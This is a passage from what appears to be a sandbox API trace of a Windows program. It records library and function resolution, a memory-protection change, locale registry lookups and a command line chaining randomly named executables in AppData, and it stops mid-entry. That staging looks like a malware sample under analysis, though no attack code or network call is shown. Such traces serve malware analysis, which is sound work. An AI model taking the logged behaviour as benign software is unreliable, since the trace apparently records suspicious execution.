[0099.584] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.699] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.699] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.702] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0099.702] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0099.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0099.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0099.703] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0099.703] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0099.703] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0099.703] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0099.703] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0099.704] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0099.704] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0099.704] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0099.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0099.704] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0099.704] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0099.704] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0099.704] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0099.705] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0099.705] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0099.705] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0099.705] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.705] SetThreadLocale (Locale=0x400) returned 1 [0099.705] GetVersion () returned 0x1db10106 [0099.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0099.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0099.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.706] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0099.706] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0099.706] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.706] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0099.706] GetACP () returned 0x4e4 [0099.706] GetCurrentThreadId () returned 0xc18 [0099.706] GetVersion () returned 0x1db10106 [0099.706] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x6f1d20, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.706] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.706] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13f0000 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0099.707] GetUserDefaultUILanguage () returned 0x409 [0099.708] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0099.708] GetThreadUILanguage () returned 0x120409 [0099.708] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0099.708] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768) returned 1 [0099.708] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.708] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] GetUserDefaultUILanguage () returned 0x409 [0099.709] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0099.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0099.709] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0099.710] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.710] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0099.710] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x7044e0 [0099.710] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0099.710] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0099.710] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0099.711] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0099.711] LoadStringW (in: 